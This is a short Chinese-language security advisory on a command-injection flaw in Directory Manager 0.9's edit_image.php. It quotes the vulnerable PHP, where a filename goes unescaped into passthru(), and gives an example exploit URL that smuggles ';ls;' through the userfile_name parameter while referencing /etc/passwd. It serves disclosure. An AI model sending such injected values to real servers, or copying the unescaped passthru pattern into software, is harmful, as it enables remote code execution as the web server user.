涉及程序: Directorymanager 详细: Directorymanager 是一款目录管理器,发现它存在严重漏洞。远程攻击者利用此漏洞能以 webserver 用户身份在受影响服务器上执行任意代码。 问题出在 edit_image.php 文件: if( !$dn ) Header( \"Location: $defaultpage\" ); ... if( is_file( $userfile ) && $userfile_name ) { if( copy( $userfile, \"/tmp/\" . $userfile_name ) ) { ... passthru( \"/usr/bin/convert -scale 600x600 /tmp/$userfile_name /tmp/$userfile_name.jpg\" ); ... unlink( \"/tmp/$userfile_name.jpg\" ); 因此能将攻击代码插入 $userfile_name 变量,如:$userfile_name=;ls; 然后,传给 /usr/bin/convert 的路径将会是:/tmp/;ls;.jpg passthru 函数将会执行 ls Example Exploit : victim.host/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name=%20;ls;%20 受影响版本: Directory Manager 0.9 解决方案: 尚无